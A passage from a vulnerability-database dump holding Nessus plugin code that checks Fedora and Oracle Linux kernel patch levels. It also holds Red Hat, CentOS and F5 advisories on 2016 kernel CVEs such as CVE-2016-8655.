script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.8.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-96d276367e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-96d276367e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.8.6-201.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\nkernel-uek\n[4.1.12-61.1.27.el7uek]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) \n[Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus \nTorvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen \nHofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n\n[4.1.12-61.1.26.el7uek]\n- xen-netback: fix extra_info handling in 
xenvif_tx_err() (Paul Durrant) \n [Orabug: 25445336]\n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas \nCassel) [Orabug: 25458076]\n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076]\n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) \n[Orabug: 25430143]", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-08T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3514)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-9576", "CVE-2016-8646"], "modified": "2017-02-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3514.NASL", "href": "https://www.tenable.com/plugins/nessus/97057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97057);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8630\", \"CVE-2016-8646\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9576\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3514)\");\n script_summary(english:\"Checks rpm 
output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[4.1.12-61.1.27.el7uek]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) \n[Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus \nTorvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen \nHofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n\n[4.1.12-61.1.26.el7uek]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) \n [Orabug: 25445336]\n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas \nCassel) [Orabug: 25458076]\n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076]\n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) \n[Orabug: 25430143]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006699.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-February/006700.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-4.1.12-61.1.27.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-8630\", \"CVE-2016-8646\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9576\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3514\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.27.el6uek-0.5.3-2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", 
rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.27.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.27.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-4.1.12-61.1.27.el7uek-0.5.3-2.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-61.1.27.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-61.1.27.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nBug Fix(es):\n\n* Previously, the asynchronous page fault woke code references spinlocks, which were actually sleeping locks in the RT kernel. Because of this, when the code was executed from the exception context, a bug warning appeared on the console. 
With this update, the regular wait queue and spinlock code in this area has been modified to use simple-wait-queue and raw-spinlocks. This code change enables the asynchronous page fault code to run in a non-preemptable state without bug warnings. (BZ#1418035)", "modified": "2018-03-19T16:29:53", "published": "2017-03-02T20:22:34", "id": "RHSA-2017:0387", "href": "https://access.redhat.com/errata/RHSA-2017:0387", "type": "redhat", "title": "(RHSA-2017:0387) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:56", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. 
This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2940041.", "modified": "2018-04-12T03:33:35", "published": "2017-03-02T20:22:31", "id": "RHSA-2017:0386", "href": "https://access.redhat.com/errata/RHSA-2017:0386", "type": "redhat", "title": "(RHSA-2017:0386) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\nRed Hat would like to thank Philip Pettersson for reporting this issue.\n\nEnhancement(s):\n\n* Previously, the Broadcom bnx2x driver in the MRG kernel-rt used an incorrect PTP Hardware Clock (PHC) timer divisor value, which broke Precision Time Protocol (PTP) timestamping due to an unstable clock. This update corrects the divisor value, and the PTP timestamping is now accurate, with monotonically increasing timestamp values. 
(BZ#1411139)", "modified": "2018-06-07T08:58:26", "published": "2017-03-02T20:47:05", "id": "RHSA-2017:0402", "href": "https://access.redhat.com/errata/RHSA-2017:0402", "type": "redhat", "title": "(RHSA-2017:0402) Important: kernel-rt security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0386\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM) support is vulnerable to a null pointer dereference flaw. It could occur on x86 platform, when emulating an undefined instruction. An attacker could use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630, Important)\n\n* A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system. (CVE-2016-8655, Important)\n\n* A flaw was discovered in the Linux kernel's implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution. (CVE-2016-9083, Important)\n\n* The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine. 
(CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2940041.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-March/034362.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0386.html", "edition": 4, "modified": "2017-03-06T15:04:15", "published": "2017-03-06T15:04:15", "href": "http://lists.centos.org/pipermail/centos-announce/2017-March/034362.html", "id": "CESA-2017:0386", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-02-15T18:35:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-8655"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 
12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix 
policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:57:00", "published": "2016-12-23T00:06:00", "id": "F5:K38472857", "href": "https://support.f5.com/csp/article/K38472857", "title": "Kernel vulnerability CVE-2016-8655", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:39:32", "bulletinFamily": "software", "cvelist": ["CVE-2016-8655", "CVE-2017-1000111"], "description": "\nF5 Product Development has assigned ID 710148 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H44309215 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 14.x | None | Not applicable | Not vulnerable2 | None | None \n13.x | None | Not Applicable \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not 
